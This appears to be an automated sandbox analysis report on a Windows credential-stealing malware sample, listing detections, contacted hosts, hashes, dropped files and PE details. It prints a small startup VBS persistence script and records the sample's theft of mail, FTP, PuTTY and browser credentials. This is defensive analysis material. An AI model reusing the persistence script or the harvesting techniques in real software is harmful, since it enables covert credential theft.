IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
System Network Configuration Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528987 Sample: q6utlq83i0.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 36 mail.privateemail.com 2->36 38 api.ipify.org 2->38 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 4 other signatures 2->58 9 q6utlq83i0.exe 3 2->9         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 32 C:\Users\user\AppData\...\incalculability.exe, PE32 9->32 dropped 15 incalculability.exe 1 9->15         started        70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->70 19 incalculability.exe 12->19         started        signatures6 process7 file8 34 C:\Users\user\AppData\...\incalculability.vbs, data 15->34 dropped 44 Antivirus detection for dropped file 15->44 46 Multi AV Scanner detection for dropped file 15->46 48 Machine Learning detection for dropped file 15->48 50 4 other signatures 15->50 21 RegSvcs.exe 15 2 15->21         started        25 incalculability.exe 19->25         started        27 RegSvcs.exe 19->27         started        signatures9 process10 dnsIp11 40 mail.privateemail.com 198.54.122.135, 49731, 49739, 587 NAMECHEAP-NETUS United States 21->40 42 api.ipify.org 104.26.12.205, 443, 49730, 49738 CLOUDFLARENETUS United States 21->42 60 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->60 62 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->62 64 Tries to steal Mail credentials (via file / registry access) 21->64 66 Writes to foreign memory regions 25->66 68 Maps a DLL or memory area into another process 25->68 29 RegSvcs.exe 2 25->29         started        signatures12 process13 signatures14 72 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->72 74 Tries to steal Mail credentials (via file / registry access) 29->74 76 Tries to harvest and steal ftp login credentials 29->76 78 Tries to harvest and steal browser information (history, passwords, etc) 29->78

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
q6utlq83i0.exe63%ReversingLabsWin32.Spyware.Negasteal
q6utlq83i0.exe100%AviraHEUR/AGEN.1321671
q6utlq83i0.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\inhumate\incalculability.exe100%AviraHEUR/AGEN.1321671
C:\Users\user\AppData\Local\inhumate\incalculability.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\inhumate\incalculability.exe63%ReversingLabsWin32.Ransomware.RedLine

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://api.ipify.org/0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mail.privateemail.com
198.54.122.135
truefalse
    		unknown
    api.ipify.org
    		104.26.12.205
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://api.ipify.org/false
      • URL Reputation: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      104.26.12.205
      		api.ipify.orgUnited States
      		13335CLOUDFLARENETUSfalse
      198.54.122.135
      		mail.privateemail.comUnited States
      		22612NAMECHEAP-NETUSfalse

      General Information

      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1528987
      Start date and time:2024-10-08 14:43:19 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 6m 56s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:q6utlq83i0.exe
      renamed because original name is a hash value
      Original Sample Name:a0ce83972e16b826fc209b7272260aa7ca67b58cec13fb62c5285bde3ab7a257.exe
      Detection:MAL
      Classification:mal100.spyw.expl.evad.winEXE@14/3@2/2
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 56
      • Number of non-executed functions: 303
      Cookbook Comments:
      • Found application associated with file extension: .exe

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: q6utlq83i0.exe

      Simulations

      Behavior and APIs

      TimeTypeDescription
      08:44:18API Interceptor54x Sleep call for process: RegSvcs.exe modified
      13:44:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      104.26.12.205SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
      • api.ipify.org/
      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
      • api.ipify.org/
      hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
      • api.ipify.org/
      file.exeGet hashmaliciousRDPWrap ToolBrowse
      • api.ipify.org/
      file.exeGet hashmaliciousUnknownBrowse
      • api.ipify.org/
      file.exeGet hashmaliciousUnknownBrowse
      • api.ipify.org/
      file.exeGet hashmaliciousUnknownBrowse
      • api.ipify.org/
      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
      • api.ipify.org/
      Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
      • api.ipify.org/
      2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
      • api.ipify.org/
      198.54.122.135PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            DO9uvdGMde.exeGet hashmaliciousAgentTeslaBrowse
              4dALKsHYFM.exeGet hashmaliciousAgentTesla, AsyncRAT, PureLog Stealer, zgRATBrowse
                SecuriteInfo.com.W32.MSIL_Kryptik.KUK.gen.Eldorado.13479.2252.exeGet hashmaliciousAgentTeslaBrowse
                  IMPORT PO2024-0961 ASTG.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                    RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                      Solicitud de precio Img_Quotation PO 202400931.exeGet hashmaliciousAgentTeslaBrowse
                        PO N#U00b0202415-0004 CULTER-ASSOCIETES_pdf.exeGet hashmaliciousAgentTeslaBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          mail.privateemail.comPO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 198.54.122.135
                          PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 198.54.122.135
                          PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 198.54.122.135
                          DO9uvdGMde.exeGet hashmaliciousAgentTeslaBrowse
                          • 198.54.122.135
                          4dALKsHYFM.exeGet hashmaliciousAgentTesla, AsyncRAT, PureLog Stealer, zgRATBrowse
                          • 198.54.122.135
                          SecuriteInfo.com.W32.MSIL_Kryptik.KUK.gen.Eldorado.13479.2252.exeGet hashmaliciousAgentTeslaBrowse
                          • 198.54.122.135
                          IMPORT PO2024-0961 ASTG.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                          • 198.54.122.135
                          RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                          • 198.54.122.135
                          Solicitud de precio Img_Quotation PO 202400931.exeGet hashmaliciousAgentTeslaBrowse
                          • 198.54.122.135
                          PO N#U00b0202415-0004 CULTER-ASSOCIETES_pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 198.54.122.135
                          api.ipify.orgQUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.13.205
                          shipping.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          SPARES REQUISITION.XLSX.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 104.26.12.205
                          CMB FLORIS DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 172.67.74.152
                          SUN ACE TBN VESSEL DETAILS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 104.26.13.205
                          SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                          • 104.26.12.205
                          SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                          • 104.26.12.205
                          hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                          • 104.26.12.205
                          Ref#0503711.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.74.152
                          8ID0109FLT24PO92CD-R.pdfGet hashmaliciousHTMLPhisherBrowse
                          • 104.26.12.205

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUS103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          file.exeGet hashmaliciousLummaCBrowse
                          • 104.21.53.8
                          RQ#071024.exeGet hashmaliciousFormBookBrowse
                          • 104.21.11.31
                          tax-invoice-0711.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.97.3
                          PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          http://cdn.prod.website-files.com/66006200351a0e5dfaa727ed/66de69bda1d04790a2e6ba98_54204894406.pdfGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                          • 104.21.16.225
                          https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                          • 172.66.43.15
                          eshkere.batGet hashmaliciousXmrigBrowse
                          • 104.20.4.235
                          frik.exeGet hashmaliciousXmrigBrowse
                          • 104.20.3.235
                          NAMECHEAP-NETUSRQ#071024.exeGet hashmaliciousFormBookBrowse
                          • 162.0.238.43
                          8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                          • 199.192.21.169
                          FDA.exeGet hashmaliciousFormBookBrowse
                          • 198.54.125.199
                          PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                          • 63.250.38.167
                          na.elfGet hashmaliciousMiraiBrowse
                          • 162.255.117.53
                          PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                          • 198.54.114.247
                          Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                          • 68.65.122.222
                          IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                          • 162.213.249.216
                          Arrival Notice.exeGet hashmaliciousFormBookBrowse
                          • 162.0.238.238
                          Arrival notice.exeGet hashmaliciousFormBookBrowse
                          • 162.0.238.246

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0e103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 104.26.12.205
                          Halkbank_Ekstre_20240508_074644_755730.pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 104.26.12.205
                          http://cdn.prod.website-files.com/66006200351a0e5dfaa727ed/66de69bda1d04790a2e6ba98_54204894406.pdfGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          file.exeGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          eshkere.batGet hashmaliciousXmrigBrowse
                          • 104.26.12.205
                          JFFjXW16yR.exeGet hashmaliciousDarkCloud, PureLog Stealer, zgRATBrowse
                          • 104.26.12.205
                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                          • 104.26.12.205
                          SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Temp\endochylous

                          Download File
                          Process:C:\Users\user\Desktop\q6utlq83i0.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):267776
                          Entropy (8bit):7.89078355285729
                          Encrypted:false
                          SSDEEP:6144:yY5T40j/uallpA7F2gcfwxPXtWQGNthGAv:ygjGJ7sfYXYHthN
                          MD5:AA07B0322F0F09B9516AE13B72C989E7
                          SHA1:9863D15DBE6746B92935F33DAEE50D9F33A1D03F
                          SHA-256:163B945D94EEB276CDCFA0FE716722F9479BA7FDE628BE0E299CF77CCF2971CC
                          SHA-512:5C1F705C97BAB43339EF286853F72C77A877B87A4B7142B4D2284B734F05FFA48A14B05EA626F99BCD541A5740F74AA1052A4EA630BDF17EDE3D112C8003CF19
                          Malicious:false
                          Reputation:low
                          Preview:{..EZP3BVCEV..KG.PEMO0BV.CDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PME.P3B\\.XO.B.n.D....>+0d>D?*78=.!3-+9;.)"o"0#oY,v...n[?) w]>HvCEVO4KG'@.`cA.(n2.0.!.;ksL<m2.(D..9d!.3cA.(.2.0.s#;E!.<``,(.E.9}s>3bA.(.*'&.!.;YP3BRCEVO4KGOPEM.+0BCDNf.ME.Q7B&.E.O4KGOPEM.0aWIBMN6.LEY*1BRCEV`.KGO@EMO.CVBC.N6@MEYR3BWCEVO4KGJPEMO0BVB#@N6TME.k1BPCE.O4[GO@EMO0RVBSDN6PMEIP3BRCEVO4KG.EGM.0BVB#FN..LEYP3BRCEVO4KGOPEMO0BVBCDN..LEEP3BRCEVO4KGOPEMO0BVBCDN6PME.]1B.CEVO4KGOPEMO.CV.BDN6PMEYP3BRCEVO4KGOPEMO0BVl7!6BPMEA.2BRSEVO.JGOTEMO0BVBCDN6PMEyP3"|1!7;UKG.=EMO.CVB-DN6.LEYP3BRCEVO4KG.PE.aT#"#CDN.`MEYp1BRUEVO>IGOPEMO0BVBCDNvPM.w"@01CEV..JGO0GMO.CVBcFN6PMEYP3BRCEV.4K.OPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEMO0BVBCDN6PMEYP3BRCEVO4KGOPEM

                          C:\Users\user\AppData\Local\inhumate\incalculability.exe

                          Download File
                          Process:C:\Users\user\Desktop\q6utlq83i0.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1301411
                          Entropy (8bit):7.507505928988643
                          Encrypted:false
                          SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCznZeX4CCmLFtyfHIHjw3Oz/ijaX:7JZoQrbTFZY1iaCznMCiFtygHcOTN
                          MD5:2B2832A4E1BF4E26E59980F4162334E2
                          SHA1:A9AE9ED9B7804A21FC0CF1E6B0D7D2E9F18B8336
                          SHA-256:A0CE83972E16B826FC209B7272260AA7CA67B58CEC13FB62C5285BDE3AB7A257
                          SHA-512:26FC4677D42D3C0DAE70A0F5C8C8E0987BAC137D94D6973883DE48C3DE028424E77C2227D14B4D59B9EAFE097A5E3DDE29D275FBE1DE3CE7FE880D4496228F01
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 63%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@..........................P................@.......@.........................T.......(............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...(............T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs

                          Download File
                          Process:C:\Users\user\AppData\Local\inhumate\incalculability.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):288
                          Entropy (8bit):3.408010872849407
                          Encrypted:false
                          SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1Mlxk/o0DdnriIM8lfQVn:DsO+vNloRKQ1MlCnFmA2n
                          MD5:1C2E37660FEE8AB5C54D47F2277FF747
                          SHA1:FA1B24A02C0C385BC217B2C9F7DDDB93AE065127
                          SHA-256:A41BBABDF59C5760E8D455EDD5BC8D29C3356D4FA1BA1E7958FEE5A6E12E33F9
                          SHA-512:22E12564CF89BEA90D11C2405A2566B26EC28D305F9E915710FCF6269983AD7A80E32829017E5B117D2C656C23D1B925ABA61748A32B079E4D52567DFF68E952
                          Malicious:true
                          Reputation:low
                          Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.i.n.h.u.m.a.t.e.\.i.n.c.a.l.c.u.l.a.b.i.l.i.t.y...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.507505928988643
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:q6utlq83i0.exe
                          File size:1'301'411 bytes
                          MD5:2b2832a4e1bf4e26e59980f4162334e2
                          SHA1:a9ae9ed9b7804a21fc0cf1e6b0d7d2e9f18b8336
                          SHA256:a0ce83972e16b826fc209b7272260aa7ca67b58cec13fb62c5285bde3ab7a257
                          SHA512:26fc4677d42d3c0dae70a0f5c8c8e0987bac137d94d6973883de48c3de028424e77c2227d14b4d59b9eafe097a5e3dde29d275fbe1de3ce7fe880d4496228f01
                          SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCznZeX4CCmLFtyfHIHjw3Oz/ijaX:7JZoQrbTFZY1iaCznMCiFtygHcOTN
                          TLSH:D755E122B9C68036C2F323B19E7EF769963D69370336D29727C82D615E905816B39733
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                          File Icon

                          Icon Hash:1733312925935517

                          Static PE Info

                          General

                          Entrypoint:0x4165c1
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                          Entrypoint Preview

                          Instruction
                          call 00007FF158612A3Bh
                          jmp 00007FF1586098AEh
                          int3
                          int3
                          int3
                          int3
                          int3
                          push ebp
                          mov ebp, esp
                          push edi
                          push esi
                          mov esi, dword ptr [ebp+0Ch]
                          mov ecx, dword ptr [ebp+10h]
                          mov edi, dword ptr [ebp+08h]
                          mov eax, ecx
                          mov edx, ecx
                          add eax, esi
                          cmp edi, esi
                          jbe 00007FF158609A2Ah
                          cmp edi, eax
                          jc 00007FF158609BC6h
                          cmp ecx, 00000080h
                          jc 00007FF158609A3Eh
                          cmp dword ptr [004A9724h], 00000000h
                          je 00007FF158609A35h
                          push edi
                          push esi
                          and edi, 0Fh
                          and esi, 0Fh
                          cmp edi, esi
                          pop esi
                          pop edi
                          jne 00007FF158609A27h
                          jmp 00007FF158609E02h
                          test edi, 00000003h
                          jne 00007FF158609A36h
                          shr ecx, 02h
                          and edx, 03h
                          cmp ecx, 08h
                          jc 00007FF158609A4Bh
                          rep movsd
                          jmp dword ptr [00416740h+edx*4]
                          mov eax, edi
                          mov edx, 00000003h
                          sub ecx, 04h
                          jc 00007FF158609A2Eh
                          and eax, 03h
                          add ecx, eax
                          jmp dword ptr [00416654h+eax*4]
                          jmp dword ptr [00416750h+ecx*4]
                          nop
                          jmp dword ptr [004166D4h+ecx*4]
                          nop
                          inc cx
                          add byte ptr [eax-4BFFBE9Ah], dl
                          inc cx
                          add byte ptr [ebx], ah
                          ror dword ptr [edx-75F877FAh], 1
                          inc esi
                          add dword ptr [eax+468A0147h], ecx
                          add al, cl
                          jmp 00007FF15AA82227h
                          add esi, 03h
                          add edi, 03h
                          cmp ecx, 08h
                          jc 00007FF1586099EEh
                          rep movsd
                          jmp dword ptr [00000000h+edx*4]

                          Rich Headers

                          Programming Language:
                          • [ C ] VS2010 SP1 build 40219
                          • [C++] VS2010 SP1 build 40219
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [ASM] VS2010 SP1 build 40219
                          • [RES] VS2010 SP1 build 40219
                          • [LNK] VS2010 SP1 build 40219

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                          RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                          RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                          RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                          RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                          RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                          RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                          RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                          RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                          RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                          RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                          RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                          RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                          RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                          RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                          RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                          RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                          RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                          RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                          RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                          RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                          RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                          RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                          RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                          RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                          RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                          RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                          Imports

                          DLLImport
                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
